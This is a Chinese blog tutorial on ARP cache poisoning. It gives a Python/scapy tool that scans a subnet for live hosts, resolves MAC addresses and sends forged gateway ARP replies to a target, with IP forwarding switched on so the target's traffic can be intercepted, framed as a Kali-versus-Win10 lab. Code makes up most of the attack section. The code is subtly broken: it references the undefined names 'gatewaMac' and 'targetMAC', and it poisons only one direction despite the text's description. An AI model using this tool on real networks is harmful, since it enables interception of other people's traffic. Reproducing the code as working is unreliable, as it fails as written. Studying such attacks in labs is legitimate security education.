Python渗透测试之ARP毒化和协议应用

简介: Python渗透测试之ARP毒化和协议应用

Python渗透测试之ARP毒化和协议应用
1. ARP毒化
ARP毒化是一种比较老的渗透测试技术,通过ARP毒化技术分析并提取内网流量中的敏感信息,往往会有许多意外的收获。

1.1 工作原理
ARP(地址解析协议)是数据链路层的协议, 主要负责根据网络层地址(IP)来获取数据链路层地址(MAC)。以太网协议规定,同一局域网中的一台主机要和另一台主机进行直接通信,必须知道目标主机的MAC地址。而在TCP/IP中,网络只关注目标主机的IP地址,这就导致在以太网中使用IP协议时,数据链路层的以太网协议接收到网络层的IP协议提供的数据中,只包含目的主机IP地址,于是需要ARP来完成IP地址到MAC地址到转换。本地ARP缓存表是有生存周期的,ARP有一个重大缺陷:ARP是建立在网络中各个主机互相信任的基础上的,主机接收到ARP应答报文时不会检测该报文的真实性,而直接将报文中的IP和MAC记入其ARP缓存表。如果ARP缓存表中有相同的地址项,则会对其进行更新。由此,攻击者可以向受害者主机发送伪ARP应答包,毒化受害主机的ARP缓存表。如下图:

开始毒化时,攻击机会给靶机发送ARP应答包说“我就是网关”,同时也会给网关发送ARP应答包说“我就是靶机。由于ARP缺陷,靶机和网关都会认为这应答包是真的。这样靶机和网关之间的通信就变成上图所示,靶机和网关之间的流量都要通过攻击机。

靶机ARP毒化之前,网关IP和MAC地址、攻击机IP和MAC地址,缓存表如下图红框:

image.png

下图是攻击机MAC地址
image.png

靶机ARP毒化之后,网关IP和MAC地址,缓存表如下图红框:

image.png

网关MAC地址变成攻击机的MAC地址了。

1.2 ARP毒化及应用
运行环境:

攻击机:Linux kali 5.10.0

靶 机:Win10

功能模块:

获取网段内存活主机
获取指定IP主机的MAC地址
ARP毒化
示例代码如下:

#_*_coding:utf-8_*_
# 作者      :liuxiaowei
# 创建时间   :4/25/22 9:08 AM
# 文件      :arp获取网络存活主机.py
# IDE      :PyCharm


from scapy.all import *
import sys
import os

# 存放本机的mac地址
lmac = ""
# 存放本机的ip地址
#lip = ""
# 存放存活主机的ip和mac的字典
liveHost = {
   }

# 获取存活主机的IP地址和MAC地址的函数
def GetAllMAC(lip):
    # IP扫描列表
    scanList = lip + '/24'
    try:
        # 通过对每个IP都进行ARP广播,获得存活主机的MAC地址
        ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=scanList), timeout=2)
    except Exception as e:
        print(e)

    # ARP广播发送完毕后执行
    else:
        # ans包含存活主机返回的响应包和响应内容
        for send, rcv in ans:
            addrList = rcv.sprintf("%Ether.src%|%ARP.psrc%")
            liveHost[addrList.split("|")[1]] = addrList.split("|")[0]

# 根据IP地址获取主机的MAC地址
def GetOneMAC(targetIP):
    # 若该IP地址存在,则返回MAC地址
    if targetIP in liveHost.keys():
        return liveHost[targetIP]
    else:
        return 0

# ARP毒化函数
def poison(targetIP, gatewayIP, ifname):
    # 获取毒化主机的MAC地址
    targetMac = GetOneMAC(targetIP)
    # 获取网关的MAC地址
    gatewayMac = GetOneMAC(gatewayIP)

    if targetMac and gatewaMac:
        while True:
            # 对目标主机毒化
            sendp(Ether(src=lmac, dst=targetMac)/ARP(hwsrc =lmac, hwdst = targetMAC, psrc=gatewayIP, pdst=targetIP, op=2),
                  iface = ifname, verbose = False)
            time.sleep(1)
    else:
        print('目标主机/网关主机IP有误,请检查!')
        sys.exit(0)

if __name__ == "__main__":
    # 程序界面
    print('\t\t\033[0;30;46m === ARP协议功能应用 === \033[0m')

    print('\n\t\t\t[1] 获取网段内存活主机:')
    print('\n\t\t\t[2] 获取指定IP主机的MAC地址')
    print('\n\t\t\t[3] ARP毒化')
    print('\n\t\t\t[4] 退  出 ')
    # while 循环
    Done = True
    while Done:
        choice = int(input('\n\t\t\033[0;30;44m 请输入选项:\t \033[0m'))
        if choice == 1:
            lip = input('\n\t\t\033[0;30;44m 请输入网段地址:\t  \033[0m')
            GetAllMAC(lip)
            print(f'\n开始收集存活的主机.....:\n{liveHost}')
            print(f'存活主机数量为:{len(liveHost)}个')

        elif choice == 2:
            targetip = input('\n\t\t\033[0;30;44m 请输入指定主机地址:\t \033[0m')
            print(f'主机{targetip}的MAC地址: {GetOneMAC(targetip)}')
        elif choice == 3:
            print('\033[0;30;41m 开启路由转发功能.........\033[0m')
            os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
            targetip = input('\n\t\t\033[0;30;44m 请输入目标主机IP地址:\t \033[0m')
            gatewayip = input('\n\t\t\033[0;30;44m 请输入网关IP地址:\t \033[0m')
            ifname = 'eth0'
            lmac = get_if_hwaddr(ifname)  # 获取本地mac地址

            try:
                print('\033[0;30;41m 开始毒化.........\033[0m')
                print(lmac)
                print(targetip)
                poison(targetip, gatewayip, ifname)
            except KeyboardInterrupt:
                print('\033[0;30;41m === 停止ARP毒化 === \033[0m')
                print('\033[0;30;41m === 停止路由转发功能 === \033[0m')

        elif choice == 4:
            Done = False
            break

运行结果如下:

下图是程序运行界面
image.png

下图是获取网段内存活主机模块运行结果:

image.png

下图是获取指定IP地址主机的MAC地址模块运行结果:

image.png

下图是ARP毒化模块运行结果:

image.png
image.png

攻击机开启路由转发,所以靶机ping www.baidu.com是可以通的,数据包被攻击机捕获。

相关文章
|
15天前
|
存储 数据采集 人工智能
Python编程入门:从零基础到实战应用
本文是一篇面向初学者的Python编程教程,旨在帮助读者从零开始学习Python编程语言。文章首先介绍了Python的基本概念和特点,然后通过一个简单的例子展示了如何编写Python代码。接下来,文章详细介绍了Python的数据类型、变量、运算符、控制结构、函数等基本语法知识。最后,文章通过一个实战项目——制作一个简单的计算器程序,帮助读者巩固所学知识并提高编程技能。
|
19天前
|
Java 测试技术 数据安全/隐私保护
软件测试中的自动化策略与工具应用
在软件开发的快速迭代中,自动化测试以其高效、稳定的特点成为了质量保证的重要手段。本文将深入探讨自动化测试的核心概念、常见工具的应用,以及如何设计有效的自动化测试策略,旨在为读者提供一套完整的自动化测试解决方案,帮助团队提升测试效率和软件质量。
|
24天前
|
机器学习/深度学习 Python
堆叠集成策略的原理、实现方法及Python应用。堆叠通过多层模型组合,先用不同基础模型生成预测,再用元学习器整合这些预测,提升模型性能
本文深入探讨了堆叠集成策略的原理、实现方法及Python应用。堆叠通过多层模型组合,先用不同基础模型生成预测,再用元学习器整合这些预测,提升模型性能。文章详细介绍了堆叠的实现步骤,包括数据准备、基础模型训练、新训练集构建及元学习器训练,并讨论了其优缺点。
43 3
|
18天前
|
缓存 开发者 Python
深入探索Python中的装饰器:原理、应用与最佳实践####
本文作为技术性深度解析文章,旨在揭开Python装饰器背后的神秘面纱,通过剖析其工作原理、多样化的应用场景及实践中的最佳策略,为中高级Python开发者提供一份详尽的指南。不同于常规摘要的概括性介绍,本文摘要将直接以一段精炼的代码示例开篇,随后简要阐述文章的核心价值与读者预期收获,引领读者快速进入装饰器的世界。 ```python # 示例:一个简单的日志记录装饰器 def log_decorator(func): def wrapper(*args, **kwargs): print(f"Calling {func.__name__} with args: {a
33 2
|
18天前
|
机器学习/深度学习 人工智能 自然语言处理
探索未来编程:Python在人工智能领域的深度应用与前景###
本文将深入探讨Python语言在人工智能(AI)领域的广泛应用,从基础原理到前沿实践,揭示其如何成为推动AI技术创新的关键力量。通过分析Python的简洁性、灵活性以及丰富的库支持,展现其在机器学习、深度学习、自然语言处理等子领域的卓越贡献,并展望Python在未来AI发展中的核心地位与潜在变革。 ###
|
24天前
|
机器学习/深度学习 自然语言处理 语音技术
Python在深度学习领域的应用,重点讲解了神经网络的基础概念、基本结构、训练过程及优化技巧
本文介绍了Python在深度学习领域的应用,重点讲解了神经网络的基础概念、基本结构、训练过程及优化技巧,并通过TensorFlow和PyTorch等库展示了实现神经网络的具体示例,涵盖图像识别、语音识别等多个应用场景。
48 8
|
21天前
|
并行计算 算法 测试技术
C语言因高效灵活被广泛应用于软件开发。本文探讨了优化C语言程序性能的策略,涵盖算法优化、代码结构优化、内存管理优化、编译器优化、数据结构优化、并行计算优化及性能测试与分析七个方面
C语言因高效灵活被广泛应用于软件开发。本文探讨了优化C语言程序性能的策略,涵盖算法优化、代码结构优化、内存管理优化、编译器优化、数据结构优化、并行计算优化及性能测试与分析七个方面,旨在通过综合策略提升程序性能,满足实际需求。
49 1
|
22天前
|
Java 测试技术 API
软件测试中的自动化测试框架选择与应用##
在快速迭代的软件开发周期中,选择合适的自动化测试框架对于提高软件质量和开发效率至关重要。本文探讨了当前流行的几种自动化测试框架的特点和适用场景,旨在为软件开发团队提供决策依据。 ##
|
23天前
|
设计模式 开发者 Python
Python编程中的设计模式应用与实践感悟####
本文作为一篇技术性文章,旨在深入探讨Python编程中设计模式的应用价值与实践心得。在快速迭代的软件开发领域,设计模式如同导航灯塔,指引开发者构建高效、可维护的软件架构。本文将通过具体案例,展现设计模式如何在实际项目中解决复杂问题,提升代码质量,并分享个人在实践过程中的体会与感悟。 ####
|
24天前
|
机器学习/深度学习 人工智能 安全
探索AI在软件工程中的最新应用:自动化测试与代码审查
探索AI在软件工程中的最新应用:自动化测试与代码审查
下一篇
DataWorks